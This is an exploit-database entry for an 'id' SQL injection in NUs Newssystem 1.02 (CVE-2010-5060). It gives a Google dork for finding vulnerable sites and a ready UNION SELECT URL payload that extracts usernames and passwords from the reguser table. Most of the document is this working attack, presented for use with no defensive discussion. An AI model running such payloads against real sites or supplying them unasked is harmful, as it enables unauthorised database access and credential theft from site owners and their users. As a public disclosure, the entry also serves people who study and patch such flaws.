nus newssystem 1.02 - 'id' SQL Injection

Author: n3w7u
type: webapps
platform: php
port: 
date_added: 2010-03-08  
date_updated:   
verified: 1  
codes: OSVDB-62840;CVE-2010-5060  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 11674.txt  

.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.

 ~ NUs Newssystem 1.02 (id) SQL Injection Vulnerability ~

.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.

[+] Autor: n3w7u

[+] Page: http://www.internet-works.de/home.html

[+] Vulnerabilities [ SQL Injection ]

[+] Language: [ PHP ]

[+] Version: 1.02

[+] Dork : inurl:"?pageNum_RSnews"&view

.-=--=--=--=--=--=--=--=--=--=--=-.

[+] Vulnerability

    Nus.php?pageNum_RSnews=0&id=


[+] Exploitable

    http://[host]/[path]/[script].php?pageNum_RSnews=0&id=9999999+union+select+1,2,3,user,5,pass,7,8,9+from+reguser--